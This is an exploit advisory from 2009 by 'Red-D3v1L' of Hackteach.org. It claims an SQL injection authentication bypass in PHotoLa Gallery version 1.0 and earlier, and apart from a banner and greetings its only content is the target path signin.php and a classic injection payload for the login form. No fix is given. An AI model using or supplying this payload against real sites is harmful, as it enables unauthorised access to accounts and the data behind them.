PHotoLa Gallery <= 1.0 (Auth Bypass) SQL Injection Vulnerability

2009-08-07 20:17:16

==============================================================================
_ _ _ _ _ _
/ \ | | | | / \ | | | |
/ _ \ | | | | / _ \ | |_| |
/ ___ \ | |___ | |___ / ___ \ | _ |
IN THE NAME OF /_/ \_\ |_____| |_____| /_/ \_\ |_| |_|


==============================================================================
[»] ~ Note : Hacker R0x Lamerz Sux !
==============================================================================
[»] PHotoLa Gallery <= 1.0 (Auth Bypass) SQL injection Valunrability
==============================================================================
[»] my home: [ Hackteach.org ]
[»] Script: [ PHotoLa Gallery ]
[»] Language: [ PHP ]
[»] home: [ http://www.photola.co.uk ]
[»] Founder: [ Red-D3v1L < [email protected] > ]
[»] Gr44tz to: [ All member Hackteach.org/cc ]

###########################################################################



===[ Exploit SQL ]===

[»] [PaTH]/signin.php


[»] Exploit : 'or 1=1/*



Author: Red-D3v1L <-

###########################################################################

#

Fixes

No fixes

In order to submit a new fix you need to be registered.